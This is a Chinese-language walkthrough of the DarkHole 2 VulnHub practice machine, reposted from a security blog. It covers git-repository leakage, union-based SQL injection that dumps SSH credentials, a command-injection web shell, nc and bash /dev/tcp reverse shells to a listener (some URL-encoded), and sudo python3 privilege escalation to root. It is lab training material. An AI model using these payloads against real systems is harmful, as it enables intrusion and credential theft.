靶机实战系列之darkhole_2靶机

admin 2024年9月26日19:20:05评论8 views字数 6381阅读21分16秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 

靶机地址:

https://download.vulnhub.com/darkhole/darkhole_2.zip

内容简介:

主机发现

端口扫描

信息收集

Git 库泄漏

源码分析

SQL注入

端口转发

信息收集

密码爆破

水平提权

Root提权

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之darkhole_2靶机

1.2 端口扫描

nmap -p-  192.168.112.136

靶机实战系列之darkhole_2靶机

1.3 信息搜集

nmap  -p22,80 -A  192.168.112.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 22:21 EDTNmap scan report for 192.168.112.136Host is up (0.00071s latency).PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))| http-git: |   192.168.112.136:80/.git/|     Git repository found!|     Repository description: Unnamed repository; edit this file 'description' to name the...|_    Last commit message: i changed login.php file for more secure | http-cookie-flags: |   /: |     PHPSESSID: |_      httponly flag not set|_http-title: DarkHole V2|_http-server-header: Apache/2.4.41 (Ubuntu)MAC Address: 00:0C:29:FF:A4:81 (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.6Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT     ADDRESS1   0.71 ms 192.168.112.136OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

查看到了git版本

http://192.168.112.136/.git/

1.4 Git库泄露

靶机实战系列之darkhole_2靶机

下载git库

wget  -r   http://192.168.112.136/.gitcd 192.168.112.136/git log        // 查看更新日志git clone  .  backup   //还原源代码git checkout  a4d900a8d85e8938d3601f3cef113ee293028e10  //还原到第二次更新cat login.php

靶机实战系列之darkhole_2靶机

分析出在第二次更新的时候存在默认的身份认证

源代码还原到第二次的时候  

a4d900a8d85e8938d3601f3cef113ee293028e10

靶机实战系列之darkhole_2靶机

存在默认的账号密码

靶机实战系列之darkhole_2靶机

账户  lush@admin.com   密码  321   登录页面 http://192.168.112.136/login.php

靶机实战系列之darkhole_2靶机

靶机实战系列之darkhole_2靶机

登陆成功!

1.5 SQL注入

发现id=1存在sql注入字符型报错 

http://192.168.112.136/dashboard.php?id=1
http://192.168.112.136/dashboard.php?id=1%27+order+by+6--+    //查看字段数为 6http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,2,3,4,5,6--+  //查询字段位置

靶机实战系列之darkhole_2靶机

http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,database(),3,4,5,6--+ //查数据库名称darkhole_2

靶机实战系列之darkhole_2靶机

http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%22darkhole_2%22--+ //查询表名称ssh

查询字段

靶机实战系列之darkhole_2靶机

http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,GROUP_CONCAT(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=%22ssh%22--+id  pass  user

爆破字段

http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,id,user,4,pass,6%20from%20ssh%20--+账户 jehad密码   fool

靶机实战系列之darkhole_2靶机

ssh登陆

 ssh  jehad@192.168.112.136    //密码   fool

靶机实战系列之darkhole_2靶机

登陆成功

1.6 端口转发+信息收集

cat  /etc/passwd// 查看用户信息root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinsystemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:106::/nonexistent:/usr/sbin/nologinsyslog:x:104:110::/home/syslog:/usr/sbin/nologin_apt:x:105:65534::/nonexistent:/usr/sbin/nologintss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/falseuuidd:x:107:112::/run/uuidd:/usr/sbin/nologintcpdump:x:108:113::/nonexistent:/usr/sbin/nologinlandscape:x:109:115::/var/lib/landscape:/usr/sbin/nologinpollinate:x:110:1::/var/cache/pollinate:/bin/falsesshd:x:111:65534::/run/sshd:/usr/sbin/nologinsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinlama:x:1000:1000:darkhole:/home/lama:/bin/bashlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/falseusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologinmysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/falsejehad:x:1001:1001:,,,:/home/jehad:/bin/bashlosy:x:1002:1002:,,,:/home/losy:/bin/bash

发现存在三个账户

losy   jehad  lama
cd  /homecd  jehad/cat .bash_history

靶机实战系列之darkhole_2靶机

发现存在本地端口转发

ssh -L 127.0.0.1:90:192.168.135.129:9999 jehad@192.168.135.129curl "http://localhost:9999/?cmd=id"cat /etc/crontab exitcurl "http://localhost:9999/?cmd=wget http://google.com"curl "http://localhost:9999/?cmd=wget&http://google.com"curl "http://localhost:9999/?cmd=wget%20http://google.com"curl "http://localhost:9999/?cmd=chmod%20+s%20/bin/bash"ls -la /usr/bin/bashcurl "http://localhost:9999/?cmd=cat%20/etc/passwd"curl "http://localhost:9999/?cmd=nc%20-e%20/bin/sh%20192.168.135.128%204242"curl "http://localhost:9999/?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>&1|nc%20192.168.135.128%204242%20>/tmp/f"clearcurl "http://127.0.0.1:9999/?cmd=ls -la"curl "http://127.0.0.1:9999/?cmd=ls%20-la"curl "http://127.0.0.1:9999/?cmd=cd%20~&ls"curl "http://127.0.0.1:9999/?cmd=cd%20~&&ls"curl "http://127.0.0.1:9999/?cmd=cd%20~||ls"curl "http://127.0.0.1:9999/?cmd=cd%20/home/losy%20&&%20ls"

似乎是让别人攻击进入了

ss -pantu | grep 9999ps -ef | grep 9999cd  /opt/webcat index.phpcurl  http://127.0.0.1:9999/?cmd=id

靶机实战系列之darkhole_2靶机

得到losy权限

1.7 水平提权

利用

https://gchq.github.io/CyberChef/

进行url编码

bash -c "bash -i >& /dev/tcp/192.168.112.128/4242 0>&1"

靶机实战系列之darkhole_2靶机

把反弹代码经过url编码得到payload

bash -c "bash -i >& /dev/tcp/192.168.112.128/4242 0>&1"

bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E112%2E128%2F4242%200%3E%261%22

执行此代码成功反弹shell,得到losy用户权限

curl  http://127.0.0.1:9999/?cmd=bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E112%2E128%2F4242%200%3E%261%22

靶机实战系列之darkhole_2靶机

1.8 root提权

cat  .bash_historypython3 -c 'import pty;pty.spawn("/bin/bash")'  //升级终端sudo -l   // 密码  gangsudo  python3 -c 'import pty;pty.spawn("/bin/bash")' //获得 root权限

发现密码password:gang

靶机实战系列之darkhole_2靶机

靶机实战系列之darkhole_2靶机

靶机实战系列之darkhole_2靶机

注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"

靶机实战系列之darkhole_2靶机

原文始发于微信公众号(嗨嗨安全):靶机实战系列之darkhole_2靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月26日19:20:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之darkhole_2靶机http://cn-sec.com/archives/3210986.html

发表评论

匿名网友 填写信息